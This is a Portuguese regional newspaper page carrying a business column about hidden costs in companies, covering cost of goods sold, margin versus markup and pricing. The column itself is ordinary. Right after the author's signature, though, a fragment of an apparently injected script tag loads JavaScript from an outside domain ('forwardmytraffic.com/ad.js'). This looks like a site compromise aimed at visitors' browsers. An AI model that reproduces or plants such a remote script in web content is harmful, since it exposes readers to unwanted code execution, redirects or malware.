InícioDestaquePorque eu vendo muito, mas não vejo dinheiro sobrar?

Porque eu vendo muito, mas não vejo dinheiro sobrar?

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

Toda empresa é uma máquina. Essa máquina é sistemática, porém necessita de insumos básicos para seu funcionamento. Esses insumos são as pessoas.

 

O grande desafio de todas as empresas é lidar com as pessoas. Existem problemas em processos, controles e indicadores, mas realmente a grande e atual dificuldade é liderar pessoas.

 

Estamos vivendo a era da tecnologia, todo mundo usando celular, mesmo as empresas tendo resistência, é quase inevitável.

 

Como se adequar a isso, se não podemos mudar uma geração?

 

Esse breve preâmbulo foi para pensarmos: como estamos liderando nossas pessoas, e essas pessoas que lideramos, quanto elas geram de resultados? E é muito importante lembrar: O RESULTADO da sua equipe, é o espelho da sua GERÊNCIA!

 

É nesse escopo que entramos: RESULTADOS….

 

Quais os fatores, ou quais os esconderijos do seu dinheiro na sua empresa? Você conhece esses fatores ou esconderijos?

 

A partir daqui passaremos a conhecer cada fator e ou lugar onde o seu dinheiro se esconde dentro da sua empresa, e assim você saberá onde buscá-lo, bem como, terá ferramentas para utilizá-lo melhor. O que você acha?

 

Vamos lá!

 

Para iniciar, acredito que seja legal, entendermos e tratarmos alguns fatores e ou esconderijos:

 

  • CMV – Custo da Mercadoria Vendida;
  • Margem;
  • Precificação;
  • Perdas;
  • Custos Fixos;
  • Índice de Liquidez Corrente;
  • Índice de Liquidez Geral;
  • Retorno Sobre Investimento
  • VPL – Valor Presente Líquido
  • TIR – Taxa Interna de Retorno

 

1 – CMV ou Custo da Mercadoria Vendida

O CMV ou Custo da Mercadoria Vendida nada mais é que o Custo da Venda da Mercadoria. Esse custo flutua a partir de duas variáveis: Giro e Margem.

 

Portanto, o seu dinheiro pode sim estar escondido dentro da complexidade do CMV, pois quando falamos de Giro, podemos citar MIX, SORTIMENTO E LAYOUT de loja, bem como, quando falamos de margem, podemos citar a precificação e ou pricing. Nesses dois universos existem centenas de possibilidades, bem como “dinheiros que a sua empresa não consegue ver” que estão escondidos nessas diversas mazelas, que são chamadas comumente de resultados.

 

2 – Margem

A margem é como se fosse um lastro, sobra ou gordura que é inserido em forma de porcentual sobre o custo total ou parcial dos produtos a serem revendidos ou produtos acabados oferecidos por indústrias. Essa margem aplicada pode ser: Bruta ou Líquida.

 

Com certeza absoluta, parte da sua grana está acoplada na margem. Há um grande equívoco considerado por empresários em geral. Em diversas situações, uma margem bruta de 70% é inserida sobre o preço de compra, e o proprietário acredita fielmente que está ganhando esse montante. Grande mentira!! Se você compra um produto a R$ 1,00 e insere 70% de margem sobre ele, seu preço de venda será de R$ 1,70. Logo, quanto seu preço de compra representa Percentualmente do seu Preço de Venda? Representa 58,82%, ou seja, sua margem bruta é de 41,17% e não de 70%. É um erro muito comum das empresas que pensam que estão ganhando X, mas na verdade boa parte do dinheiro está acoplada nesse erro, e na verdade estão ganhando Y.

 

Fica a dica, e na próxima semana continuamos com as explicações …..

Espero que tenham gostado.

Qualquer dúvida estou a disposição.

Abraço,

Prof. Christian… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.